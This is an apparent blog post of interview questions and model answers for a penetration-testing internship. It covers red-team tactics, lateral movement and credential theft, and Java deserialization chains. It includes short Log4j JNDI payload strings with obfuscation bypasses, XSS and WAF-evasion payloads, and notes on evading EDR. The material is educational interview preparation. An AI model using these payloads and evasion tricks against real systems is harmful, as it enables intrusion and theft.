2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

深信服-漏洞研究员实习

[1. 在XX实习时做了什么](#1. 在XX实习时做了什么)

[2. 渗透测试的思路简单描述](#2. 渗透测试的思路简单描述)

[3. 护网中承担什么角色](#3. 护网中承担什么角色)

[4. 红队一些攻击思路](#4. 红队一些攻击思路)

[5. 拿下系统如何横向](#5. 拿下系统如何横向)

[6. Log4j漏洞(CVE-2021-44228)研究](#6. Log4j漏洞(CVE-2021-44228)研究)

[7. 内存码(Shellcode Loader)了解](#7. 内存码(Shellcode Loader)了解)

[8. 冰蝎、哥斯拉工具分析](#8. 冰蝎、哥斯拉工具分析)

[9. 攻击队研究重点](#9. 攻击队研究重点)

[10. 擅长漏洞/攻击方向](#10. 擅长漏洞/攻击方向)

[11. Shiro反序列化漏洞解析](#11. Shiro反序列化漏洞解析)

[12. Bypass方法示例](#12. Bypass方法示例)


深某服-漏洞研究员实习

复制代码
在XX实习时做了什么

渗透测试的思路简单描述

护网中承担什么角色

红队一些攻击思路

拿下系统如何横向

前段时间的那个log4j有研究吗,可以简单说一下吗

(接上)有哪些混淆绕过的方法

内存码有没有了解

冰蝎、哥斯拉这些工具有没有了解过

做攻击队的时候有没有研究过什么攻击,比如研究一些工具还是魔改什么的

那么多漏洞和攻击,比较擅长哪一个

说下shiro反序列化的形成原因、利用链

对一些bypass的方法有没有了解过,什么姿势可以简单介绍一下。

1. 在XX实习时做了什么

在实习期间,主要围绕渗透测试、漏洞挖掘和攻防实战展开:

  • 渗透测试项目:参与内/外部资产的安全评估,包括Web应用、API接口和内部系统的漏洞扫描(如SQL注入、XSS、逻辑漏洞等)。
  • 漏洞挖掘与利用:针对Java框架(Shiro、Fastjson)、中间件(WebLogic、Tomcat)进行代码审计,复现历史漏洞并尝试发现新攻击面。
  • 红蓝对抗支持:协助防守方分析攻击流量,溯源攻击链;同时模拟攻击队编写PoC工具,绕过WAF规则。
  • 报告输出:整理漏洞复现步骤、风险等级和修复方案,推动开发团队修复高危漏洞。

2. 渗透测试的思路简单描述

渗透测试核心流程分五阶段:

  1. 信息收集
    • 子域名枚举(如subfinder)、端口扫描(nmap)、指纹识别(Wappalyzer)。
    • 敏感信息泄露(GitHub源码、备份文件、配置文件)。
  2. 漏洞扫描与验证
    • 工具自动化扫描(AWVS、Nessus),结合手动验证误报(如逻辑漏洞、未授权访问)。
  3. 权限提升
    • 通过弱口令、反序列化、文件上传等漏洞获取初始立足点。
  4. 横向移动
    • 利用内网协议(SMB、WinRM)、凭证窃取(Mimikatz)扩大控制范围。
  5. 报告输出
    • 输出漏洞详情、攻击路径图及修复建议。

3. 护网中承担什么角色

  • 攻击队角色
    • 突破入口:针对暴露面(Web应用、VPN、邮件系统)进行漏洞利用(如Log4j、OA系统RCE)。
    • 横向渗透:通过内网代理(如reGeorg)和口令爆破(Hydra)拿下域控或核心数据库。
  • 防守经验
    • 分析攻击流量特征(如冰蝎流量加密),优化WAF规则;
    • 协助处置应急事件(如Webshell查杀、日志溯源)。

4. 红队一些攻击思路

初始入侵阶段

  • 鱼叉攻击:钓鱼邮件投递恶意文档(CVE-2021-40444)或伪装升级包(供应链污染)。
  • 0day/Nday利用:针对未修复的高危漏洞快速突破(如Confluence RCE)。

横向扩展阶段

  • 凭证窃取:通过Mimikatz提取内存密码、Kerberoasting攻击获取服务账户哈希。
  • 权限维持:部署隐蔽后门(如计划任务、WMI事件订阅)、黄金票据伪造域管权限。

5. 拿下系统如何横向

横向移动关键步骤:

  1. 信息收集
    • 内网资产扫描(Netsparker、Fscan),定位高价值目标(数据库、域控)。
  2. 凭证利用
    • Pass-the-Hash(NTLM哈希传递)、Pass-the-Ticket(Kerberos票据转发)。
  3. 协议漏洞
    • 利用SMBGhost(CVE-2020-0796)、Zerologon(CVE-2020-1472)直接提权。
  4. 隐蔽通道
    • 通过DNS隧道(dnscat2)、HTTP代理(Chisel)绕过网络隔离。

6. Log4j漏洞(CVE-2021-44228)研究

原理 :Log4j 2.x版本解析日志时,未对${jndi:ldap://xxx}等表达式过滤,导致JNDI注入,远程加载恶意类触发RCE。

混淆绕过方法

  • 环境变量注入${${env:XXX:-j}ndi:ldap://xxx}(利用默认值覆盖)。
  • Lower/Upper关键字${jNdi:ldap://xxx}(大小写绕过)。
  • 嵌套表达式${${::-j}ndi:ldap://xxx}(特殊符号替换)。
  • 绕过高版本限制 :利用上下文变量(如${ctx:xxx})拼接攻击载荷。

7. 内存码(Shellcode Loader)了解

  • 原理:将恶意代码(如Cobalt Strike的Beacon)直接加载到内存中执行,避免文件落地。
  • 常见技术
    • 反射型DLL注入 :通过VirtualAlloc分配内存并执行。
    • 进程镂空(Process Hollowing):替换合法进程内存内容(如svchost.exe )。
  • 对抗检测:通过加密壳(如AES)、API调用混淆(如Syscall直接调用)绕过EDR。

8. 冰蝎、哥斯拉工具分析

  • 冰蝎(Behinder)
    • 特点:动态密钥加密流量(AES+随机Key),支持HTTP/HTTPS隧道。
    • 检测难点 :特征为固定UA头Content-Type: application/octet-stream
  • 哥斯拉(Godzilla)
    • 优势:支持更多加密算法(如RSA)、模块化功能(内网穿透、端口扫描)。
    • 绕过技巧:修改默认密钥、自定义HTTP头字段混淆流量。

9. 攻击队研究重点

  • 工具武器化
    • 魔改C2框架(如Cobalt Strike Aggressor脚本),适配目标环境。
    • 开发轻量级漏洞利用工具(如Fastjson一键利用)。
  • 流量混淆
    • 对Webshell流量进行分段编码(如Base64+Hex混合)、添加垃圾数据。
  • 供应链攻击
    • 研究第三方组件漏洞(如npm包、Docker镜像投毒)。

10. 擅长漏洞/攻击方向

反序列化漏洞

  • 擅长点:Java反序列化链构造(如CommonsBeanutils、CC链)、内存马注入。
  • 实战案例:通过Shiro RememberMe字段反序列化打入内网,结合JNDI注入加载内存马。

11. Shiro反序列化漏洞解析

形成原因

  • Shiro使用硬编码AES密钥加密RememberMe字段,攻击者通过伪造Cookie触发反序列化。
  • 反序列化入口点:AbstractRememberMeManager#decrypt方法。

利用链(以CommonsBeanutils为例)

  1. 触发点 :恶意Cookie → AES解密 → 反序列化 → 调用BeanComparator.compare()
  2. 利用链 :通过PropertyUtils.getProperty() 触发任意Getter方法,最终执行TemplatesImpl加载字节码。

12. Bypass方法示例

常见绕过姿势

  • 编码混淆 :URL编码、Unicode转义(如<img src=x onerror=alert(1)>\u003cimg\u0020src=x...)。
  • 关键字分割 :利用注释符或拼接(如<svg/onload=alert``(1)>)。
  • 协议特性
    • HTTP参数污染(HPP):param=1&param=payload触发解析差异。
    • 特殊符号:${1+1}在Thymeleaf等模板引擎中执行表达式。
相关推荐
张人玉7 分钟前
TCP 的三次握手和四次挥手
网络·tcp/ip·c#
T___T2 小时前
全方位解释 JavaScript 执行机制(从底层到实战)
前端·面试
9号达人2 小时前
普通公司对账系统的现实困境与解决方案
java·后端·面试
qq_254674412 小时前
华为交换机上配置基于 IP 地址的 ACL
网络
勤劳打代码2 小时前
条分缕析 —— 通过 Demo 深入浅出 Provider 原理
flutter·面试·dart
宁雨桥2 小时前
WebSocket 核心 API 速查表
网络·websocket·网络协议
努力学算法的蒟蒻2 小时前
day10(11.7)——leetcode面试经典150
面试
打不了嗝 ᥬ᭄3 小时前
【Linux】网络层协议
linux·网络·c++·网络协议·http
进击的野人3 小时前
JavaScript 中的数组映射方法与面向对象特性深度解析
javascript·面试
南山安3 小时前
以腾讯面试题深度剖析JavaScript:从数组map方法到面向对象本质
javascript·面试